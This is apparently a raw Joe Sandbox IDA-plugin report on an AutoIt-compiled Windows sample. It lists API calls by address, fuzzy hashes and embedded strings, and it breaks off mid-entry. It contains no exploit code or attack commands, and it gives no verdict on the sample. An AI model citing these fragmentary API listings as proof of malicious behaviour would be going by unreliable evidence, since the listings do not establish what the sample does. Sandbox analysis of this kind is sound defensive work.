                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 1687751970-22481851
                                                                                  • Opcode ID: 06cea468d397aad29bab58faf6ea008484e286e5d90cc33862319d340868d1d3
                                                                                  • Instruction ID: af369ccb4a0932e3059e7863750893ff08f535fe071488c244031bbd8c9fbc17
                                                                                  • Opcode Fuzzy Hash: 06cea468d397aad29bab58faf6ea008484e286e5d90cc33862319d340868d1d3
                                                                                  • Instruction Fuzzy Hash: 1C41F976C1062DABDB11EBA5EC85DEDB7B8FF15304F00402AF905A31A1EB74AD45DB90
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 005367FD
                                                                                  • __swprintf.LIBCMT ref: 0053680A
                                                                                    • Part of subcall function 0051172B: __woutput_l.LIBCMT ref: 00511784
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00536834
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00536840
                                                                                  • LockResource.KERNEL32(00000000), ref: 0053684D
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0053686D
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0053687F
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0053688E
                                                                                  • LockResource.KERNEL32(?), ref: 0053689A
                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005368F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                  • String ID: 5Z
                                                                                  • API String ID: 1433390588-3451842240
                                                                                  • Opcode ID: 342519ad5bf49cb245f08c51f1b6fd9f8a9ac6efd57a25b6ea81ee441e561e41
                                                                                  • Instruction ID: dd345a5a0ec3eb56790cc87e49848e8dd05985779b4b8d86436e61219d9a29bd
                                                                                  • Opcode Fuzzy Hash: 342519ad5bf49cb245f08c51f1b6fd9f8a9ac6efd57a25b6ea81ee441e561e41
                                                                                  • Instruction Fuzzy Hash: B7318F7590021ABBDB109F60ED59EBEBFB8FF08340F008429F906D2151E730DA55EA70
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005636F4,00000010,?,Bad directive syntax error,0058DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 005325D6
                                                                                  • LoadStringW.USER32(00000000,?,005636F4,00000010), ref: 005325DD
                                                                                  • _wprintf.LIBCMT ref: 00532610
                                                                                  • __swprintf.LIBCMT ref: 00532632
                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005326A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1080873982-4153970271
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00537B42
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00537B58
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00537B69
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00537B7B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00537B8C
Strings
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 890592661-1007645807
APIs
• timeGetTime.WINMM ref: 00537794
  • Part of subcall function 0050DC38: timeGetTime.WINMM(?,75A4B400,005658AB), ref: 0050DC3C
• Sleep.KERNEL32(0000000A), ref: 005377C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 005377E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00537806
• SetActiveWindow.USER32 ref: 00537825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00537833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00537852
• Sleep.KERNEL32(000000FA), ref: 0053785D
• IsWindow.USER32 ref: 00537869
• EndDialog.USER32(00000000), ref: 0053787A
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
  • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
• CoInitialize.OLE32(00000000), ref: 0054034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005403DE
• SHGetDesktopFolder.SHELL32(?), ref: 005403F2
• CoCreateInstance.OLE32(0057DA8C,00000000,00000001,005A3CF8,?), ref: 0054043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005404AD
• CoTaskMemFree.OLE32(?,?), ref: 00540505
• _memset.LIBCMT ref: 00540542
• SHBrowseForFolderW.SHELL32(?), ref: 0054057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005405A1
• CoTaskMemFree.OLE32(00000000), ref: 005405A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005405DF
• CoUninitialize.OLE32(00000001,00000000), ref: 005405E1
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetKeyboardState.USER32(?), ref: 00532ED6
• SetKeyboardState.USER32(?), ref: 00532F41
• GetAsyncKeyState.USER32(000000A0), ref: 00532F61
• GetKeyState.USER32(000000A0), ref: 00532F78
• GetAsyncKeyState.USER32(000000A1), ref: 00532FA7
• GetKeyState.USER32(000000A1), ref: 00532FB8
• GetAsyncKeyState.USER32(00000011), ref: 00532FE4
• GetKeyState.USER32(00000011), ref: 00532FF2
• GetAsyncKeyState.USER32(00000012), ref: 0053301B
• GetKeyState.USER32(00000012), ref: 00533029
• GetAsyncKeyState.USER32(0000005B), ref: 00533052
• GetKeyState.USER32(0000005B), ref: 00533060
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0052ED1E
• GetWindowRect.USER32(00000000,?), ref: 0052ED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0052ED8E
• GetDlgItem.USER32(?,00000002), ref: 0052ED99
• GetWindowRect.USER32(00000000,?), ref: 0052EDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0052EE01
• GetDlgItem.USER32(?,000003E9), ref: 0052EE0F
• GetWindowRect.USER32(00000000,?), ref: 0052EE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0052EE63
• GetDlgItem.USER32(?,000003EA), ref: 0052EE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0052EE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 0052EE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 0050B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0050B759,?,00000000,?,?,?,?,0050B72B,00000000,?), ref: 0050BA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0050B72B), ref: 0050B7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0050B88D
• DestroyAcceleratorTable.USER32(00000000), ref: 0056D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D90A
• DeleteObject.GDI32(00000000), ref: 0056D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
APIs
  • Part of subcall function 0050B526: GetWindowLongW.USER32(?,000000EB), ref: 0050B537
• GetSysColor.USER32(0000000F), ref: 0050B438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(0058DC00,0058DC00,0058DC00), ref: 0053D7CE
                                                                                  • GetDriveTypeW.KERNEL32(?,005A3A70,00000061), ref: 0053D898
                                                                                  • _wcscpy.LIBCMT ref: 0053D8C2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2820617543-1000479233
                                                                                  • Opcode ID: fe196674aa55ac315aa3c62919160bc713a56b3658aed8bc384a8f7982d443a2
                                                                                  • Instruction ID: 0d62f86054b748200a5e76d7cc10e64d5da2766dcef4a4690f6859ab825eb4e1
                                                                                  • Opcode Fuzzy Hash: fe196674aa55ac315aa3c62919160bc713a56b3658aed8bc384a8f7982d443a2
                                                                                  • Instruction Fuzzy Hash: 2D518135104305AFC700EF14E896A6EFBB5FF85318F20892DF599572A2DB31ED05CA52
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 004F93AB
                                                                                  • __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 00511557: _xtow@16.LIBCMT ref: 00511578
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 1502193981-2263619337
                                                                                  • Opcode ID: 728fd55d045764b8bbc52794e227b38bd5ff6eb6729fb206fac604e3d5d540db
                                                                                  • Instruction ID: 70c2cc74e9c85753fc9715793e1d7511a234e5acdefa2926c6fa7fb886a7cca2
                                                                                  • Opcode Fuzzy Hash: 728fd55d045764b8bbc52794e227b38bd5ff6eb6729fb206fac604e3d5d540db
                                                                                  • Instruction Fuzzy Hash: B141D472500209ABEB24DF74D946FBA7BE8FB88300F20446FE649D72C1EA359D42CB15
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0055A259
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0055A260
                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0055A273
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0055A27B
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0055A286
                                                                                  • DeleteDC.GDI32(00000000), ref: 0055A28F
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0055A299
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0055A2AD
                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0055A2B9
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                  • String ID: static
                                                                                  • API String ID: 2559357485-2160076837
                                                                                  • Opcode ID: 44e612dd05794cd6b33f8bd269247ab6b9c57d9f5cc54973abb52982175f2846
                                                                                  • Instruction ID: 9ecfd6ad48d8ae8e3f907fcfd385b71aa9df525e684cea60ece2f92646c22a04
                                                                                  • Opcode Fuzzy Hash: 44e612dd05794cd6b33f8bd269247ab6b9c57d9f5cc54973abb52982175f2846
                                                                                  • Instruction Fuzzy Hash: 68318D31100215ABDF115FA4EC4AFEA3F79FF19361F100315FA19A60A0C736D859EBA4
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 2620052-3771769585
                                                                                  • Opcode ID: dea133e691f8b9de96cbe3d97e5f8c23746c617f40378d10919ba183a5c82d51
                                                                                  • Instruction ID: 1c050865223cd2c16737007f14a42d48279f22c2a3e6ae5b896b687069d1dccf
                                                                                  • Opcode Fuzzy Hash: dea133e691f8b9de96cbe3d97e5f8c23746c617f40378d10919ba183a5c82d51
                                                                                  • Instruction Fuzzy Hash: 2911B471904119BBDB24AB60AC4EEEA7FBCFF90710F004069F549A6091EFB0DEC59B61
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00515047
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • __gmtime64_s.LIBCMT ref: 005150E0
                                                                                  • __gmtime64_s.LIBCMT ref: 00515116
                                                                                  • __gmtime64_s.LIBCMT ref: 00515133
                                                                                  • __allrem.LIBCMT ref: 00515189
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005151A5
                                                                                  • __allrem.LIBCMT ref: 005151BC
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005151DA
                                                                                  • __allrem.LIBCMT ref: 005151F1
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0051520F
                                                                                  • __invoke_watson.LIBCMT ref: 00515280
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                  • String ID:
                                                                                  • API String ID: 384356119-0
                                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                  • Instruction ID: 7439a6952368d99ca73beec1ee1ad4d2ed689ece81b3909e3a6fd13091bfb799
                                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                  • Instruction Fuzzy Hash: 9171C276A00F17EBF714AE78CC45BAA7BA8BF95364F14422AE510D62C1F770D9808BD0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00534DF8
                                                                                  • GetMenuItemInfoW.USER32(005B1708,000000FF,00000000,00000030), ref: 00534E59
                                                                                  • SetMenuItemInfoW.USER32(005B1708,00000004,00000000,00000030), ref: 00534E8F
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00534EA1
                                                                                  • GetMenuItemCount.USER32(?), ref: 00534EE5
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00534F01
                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00534F2B
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00534F70
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00534FB6
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534FCA
                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534FEB
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4176008265-0
                                                                                  • Opcode ID: afa9a85b98b240451e8593ebd42d098c2136d0b6c7aca016858f5b7462807a7f
                                                                                  • Instruction ID: 1a13c710b744e160c6ca71c76fbf20f04da18a3fa5fe6e592a5a6cd7a6893829
                                                                                  • Opcode Fuzzy Hash: afa9a85b98b240451e8593ebd42d098c2136d0b6c7aca016858f5b7462807a7f
                                                                                  • Instruction Fuzzy Hash: E1618B71900289AFDB21DFA4D888AAE7FB8FB45308F180559F846A7251E731BD45EF21
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00559C98
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00559C9B
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00559CBF
                                                                                  • _memset.LIBCMT ref: 00559CD0
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00559CE2
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00559D5A
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 830647256-0
                                                                                  • Opcode ID: d4ec49dc63c2eb22d28a2ad065e8234c25dc5d63056a4525a0720b39e39dd1de
                                                                                  • Instruction ID: f6e0e8202e881def161a8b47a7a3a2bd9412f216e1152c5faab0a62ea348b587
                                                                                  • Opcode Fuzzy Hash: d4ec49dc63c2eb22d28a2ad065e8234c25dc5d63056a4525a0720b39e39dd1de
                                                                                  • Instruction Fuzzy Hash: 43616975900208EFDB10DFA8CC91EEEBBB8FB09714F14415AFE05AB291D774A949DB60
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 005294FE
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00529549
                                                                                  • VariantInit.OLEAUT32(?), ref: 0052955B
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0052957B
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 005295BE
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 005295D2
                                                                                  • VariantClear.OLEAUT32(?), ref: 005295E7
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 005295F4
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005295FD
                                                                                  • VariantClear.OLEAUT32(?), ref: 0052960F
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0052961A
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: d2db1d2f717109ee99e7a8de75a65143902f36adafb0941366049f44048530e1
                                                                                  • Instruction ID: 13e09f98ccdeacd309603a9d81e745ab092b6e15acd6ed4195b845f5d9f8d4bf
                                                                                  • Opcode Fuzzy Hash: d2db1d2f717109ee99e7a8de75a65143902f36adafb0941366049f44048530e1
                                                                                  • Instruction Fuzzy Hash: 2C414231E00219AFCF01EFA4E8489DEBFB9FF59354F008065E505A3251DB71EA85DBA1
                                                                                  APIs
                                                                                  Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?Z$|?Z
• API String ID: 2862541840-3093284752
• Opcode ID: bb70eef9b0ff67422b8a04f5352d381f9f68fd9b114b68ca4883c588543a8192
• Instruction ID: 1c9a6e91252cd5241cf331e8889b6c6567b8a3ed37f72d318fe402d053a8328a
• Opcode Fuzzy Hash: bb70eef9b0ff67422b8a04f5352d381f9f68fd9b114b68ca4883c588543a8192
• Instruction Fuzzy Hash: 70914C71E00215ABEF248FA5D888FEEBBB8FF85718F108559F515AB280D770D944CBA0
APIs
  • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
  • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
• CoInitialize.OLE32 ref: 0054ADF6
• CoUninitialize.OLE32 ref: 0054AE01
• CoCreateInstance.OLE32(?,00000000,00000017,0057D8FC,?), ref: 0054AE61
• IIDFromString.OLE32(?,?), ref: 0054AED4
• VariantInit.OLEAUT32(?), ref: 0054AF6E
• VariantClear.OLEAUT32(?), ref: 0054AFCF
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: b24c01ce5502cf6e7f1b46f5eadeb94292bba6f5aab39f514dc9619bdae52029
• Instruction ID: bc2eacc62a5241fdcaa006663a0b1164336d4e043c0565b07ad6b27ba162fbdb
• Opcode Fuzzy Hash: b24c01ce5502cf6e7f1b46f5eadeb94292bba6f5aab39f514dc9619bdae52029
• Instruction Fuzzy Hash: F3619871248311AFD710DF54D888BAEBBE8BF89708F004809F9859B291D770ED48DB93
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00548168
• inet_addr.WSOCK32(?,?,?), ref: 005481AD
• gethostbyname.WSOCK32(?), ref: 005481B9
• IcmpCreateFile.IPHLPAPI ref: 005481C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00548237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0054824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 005482C2
• WSACleanup.WSOCK32 ref: 005482C8
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 417a1714a3540d00f2d93695262a74f66b2844bb6cabe7010e09aa9868d4a8f6
• Instruction ID: 1a4d6b14ccb5d52b83ff186fe826b85afb3634a25bd3f5fccb5d1ae6d05449b2
• Opcode Fuzzy Hash: 417a1714a3540d00f2d93695262a74f66b2844bb6cabe7010e09aa9868d4a8f6
• Instruction Fuzzy Hash: C351CE356046019FD720AF24DC49B7EBBE4FF48314F04886AFA5A9B2A0DB70E804DB51
APIs
• _memset.LIBCMT ref: 00559E5B
• CreateMenu.USER32 ref: 00559E76
• SetMenu.USER32(?,00000000), ref: 00559E85
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00559F12
• IsMenu.USER32(?), ref: 00559F28
• CreatePopupMenu.USER32 ref: 00559F32
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00559F63
• DrawMenuBar.USER32 ref: 00559F71
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
• Opcode ID: caf8dfba9764f792c68d89850a11c25c732138fe0031355ad1a8407287c46b89
• Instruction ID: 71238b7273eb207ea728bd09713c937fe95262c78151d1389584e5f246da11a2
• Opcode Fuzzy Hash: caf8dfba9764f792c68d89850a11c25c732138fe0031355ad1a8407287c46b89
• Instruction Fuzzy Hash: E34165B4A00209EFDB11CF64E854BEABBB5FF58305F14412AED4AA7360D734A958DF60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0053E396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0053E40C
• GetLastError.KERNEL32 ref: 0053E416
• SetErrorMode.KERNEL32(00000000,READY), ref: 0053E483
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: fc9974e01f57be21842e795e08d3a5a0fd1520ec3cb91509db5f9ff54ed2b155
• Instruction ID: c269f7bf61369bb3acfdf81bb70a5f6c68d99638c43ac48fc9bde7aa0c180305
• Opcode Fuzzy Hash: fc9974e01f57be21842e795e08d3a5a0fd1520ec3cb91509db5f9ff54ed2b155
• Instruction Fuzzy Hash: 5131A135A00209AFCB00EB64D986ABDBFF4FF49304F14842AF505AB2D1D770AE42DB91
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0052B98C
• GetDlgCtrlID.USER32 ref: 0052B997
• GetParent.USER32 ref: 0052B9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0052B9B6
• GetDlgCtrlID.USER32(?), ref: 0052B9BF
• GetParent.USER32(?), ref: 0052B9DB
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0052B9DE
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 987d480a08bd0f28bc25e9a1db9256dd9255492fb3c16ea532ed6a22466c9252
• Instruction ID: 806a10e09a3f260648f5de146f2779635ab5cfcef691eb9daa5c2a651a6e2893
• Opcode Fuzzy Hash: 987d480a08bd0f28bc25e9a1db9256dd9255492fb3c16ea532ed6a22466c9252
• Instruction Fuzzy Hash: C221D674A00108BFDB04ABA4EC86EBEBB75FF56310F10011AF655A32D1DBB95859EB30
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0052BA73
• GetDlgCtrlID.USER32 ref: 0052BA7E
• GetParent.USER32 ref: 0052BA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0052BA9D
• GetDlgCtrlID.USER32(?), ref: 0052BAA6
• GetParent.USER32(?), ref: 0052BAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0052BAC5
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: d2126a9a0e65a47d494a98b87c2ff6636a1c1bccaa747a8723ed8cb33fe8848c
• Instruction ID: af577f591e39159b2c9e88cac21592b0b39746167603cd8975ca546e6fbf0652
• Opcode Fuzzy Hash: d2126a9a0e65a47d494a98b87c2ff6636a1c1bccaa747a8723ed8cb33fe8848c
• Instruction Fuzzy Hash: 8921C175A00108BFDB00AB64EC85EBEBB75FF46300F00001AF551A31D1DBB95859AB20
APIs
• GetParent.USER32 ref: 0052BAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 0052BAF8
• _wcscmp.LIBCMT ref: 0052BB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0052BB85
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: d93118baa2aafdfdfe4c50eca39bce524db454d5c7821f7c28fe2595541e10f2
• Instruction ID: d6d2793094f7a2fd274cddc26fae1b5748384305e56d61b54731cf4e381089de
• Opcode Fuzzy Hash: d93118baa2aafdfdfe4c50eca39bce524db454d5c7821f7c28fe2595541e10f2
• Instruction Fuzzy Hash: 6811CA76648327FBFA246A24FC0BDAA7FADBF63724F200011F909E50D5EBE158916524
APIs
• VariantInit.OLEAUT32(?), ref: 0054B2D5
• CoInitialize.OLE32(00000000), ref: 0054B302
• CoUninitialize.OLE32 ref: 0054B30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 0054B40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 0054B539
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0054B56D
• CoGetObject.OLE32(?,00000000,0057D91C,?), ref: 0054B590
• SetErrorMode.KERNEL32(00000000), ref: 0054B5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0054B623
• VariantClear.OLEAUT32(0057D91C), ref: 0054B633
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: 4e8aa12fad693467a9d358c2082cc176b46d9743ba702181561b86bb47d030e4
• Instruction ID: 6fd8e257ffdc71818df3f846c22545ebcc582da3972ea508eddda31589609230
• Opcode Fuzzy Hash: 4e8aa12fad693467a9d358c2082cc176b46d9743ba702181561b86bb47d030e4
• Instruction Fuzzy Hash: 6BC10271608305AFD700DF69C8849ABBBF9BF88308F04495DF98A9B251DB71ED05CB62
APIs
• __lock.LIBCMT ref: 0051ACC1
  • Part of subcall function 00517CF4: __mtinitlocknum.LIBCMT ref: 00517D06
  • Part of subcall function 00517CF4: EnterCriticalSection.KERNEL32(00000000,?,00517ADD,0000000D), ref: 00517D1F
• __calloc_crt.LIBCMT ref: 0051ACD2
  • Part of subcall function 00516986: __calloc_impl.LIBCMT ref: 00516995
  • Part of subcall function 00516986: Sleep.KERNEL32(00000000,000003BC,0050F507,?,0000000E), ref: 005169AC
